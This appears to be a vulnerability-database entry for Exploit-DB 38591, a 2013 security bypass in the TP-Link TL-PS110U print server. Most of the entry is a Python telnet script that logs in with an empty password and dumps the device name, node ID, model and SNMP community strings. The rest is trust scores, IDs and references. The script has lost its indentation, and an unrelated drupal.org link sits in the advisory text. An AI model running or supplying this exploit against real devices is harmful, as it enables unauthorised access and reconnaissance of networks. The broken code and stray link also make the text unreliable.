ID

VAR-E-201306-0065


EDB ID

38591


TITLE

TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38591

DESCRIPTION

TP-Link TL-PS110U Print Server - 'tplink-enum.py' Security Bypass.. remote exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 38591

AFFECTED PRODUCTS

vendor:tp linkmodel:tl-ps110u print serverscope: - version: -

Trust: 1.0

vendor:tp linkmodel:tl-ps110uscope:eqversion:0

Trust: 0.3

sources: BID: 60682 // EXPLOIT-DB: 38591

EXPLOIT

source: https://www.securityfocus.com/bid/60682/info

TP-LINK TL-PS110U Print Server is prone to a security-bypass vulnerability.

Attackers can exploit this issue to bypass certain security restrictions and obtain sensitive information which may aid in further attacks.
http://drupal.org/node/207891

import telnetlib
import sys
host = sys.argv[1]
tn = telnetlib.Telnet(host)
tn.read_until("Password:")
tn.write("\r\n")
tn.read_until("choice")
tn.write("1\r\n")
tn.read_until("choice")
tn.write("1\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
if "Device Name" in i:
print i.strip()
if "Node ID" in i:
print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("2\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
if "Manufacture:" in i:
print i.strip()
if "Model:" in i:
print i.strip()
tn.write("0\r\n")
tn.read_until("choice")
tn.write("5\r\n")
data = tn.read_until("choice")
for i in data.split("\r\n"):
if "Community" in i:
print i.strip()

Trust: 1.0

sources: EXPLOIT-DB: 38591

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 38591

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38591

TYPE

'tplink-enum.py' Security Bypass

Trust: 1.0

sources: EXPLOIT-DB: 38591

CREDITS

SANTHO

Trust: 0.6

sources: EXPLOIT-DB: 38591

EXTERNAL IDS

db:EXPLOIT-DBid:38591

Trust: 1.9

db:BIDid:60682

Trust: 1.9

db:EDBNETid:59668

Trust: 0.6

sources: BID: 60682 // EXPLOIT-DB: 38591 // EDBNET: 59668

REFERENCES

url:https://www.securityfocus.com/bid/60682/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/38591/

Trust: 0.6

url:http://www.tp-link.com/en/

Trust: 0.3

url:http://www.tp-link.com/en/products/details/?model=tl-ps110u

Trust: 0.3

url:https://www.exploit-db.com/exploits/38591

Trust: 0.3

sources: BID: 60682 // EXPLOIT-DB: 38591 // EDBNET: 59668

SOURCES

db:BIDid:60682
db:EXPLOIT-DBid:38591
db:EDBNETid:59668

LAST UPDATE DATE

2022-07-27T09:15:44.332000+00:00


SOURCES UPDATE DATE

db:BIDid:60682date:2013-06-19T00:00:00

SOURCES RELEASE DATE

db:BIDid:60682date:2013-06-19T00:00:00
db:EXPLOIT-DBid:38591date:2013-06-19T00:00:00
db:EDBNETid:59668date:2013-06-19T00:00:00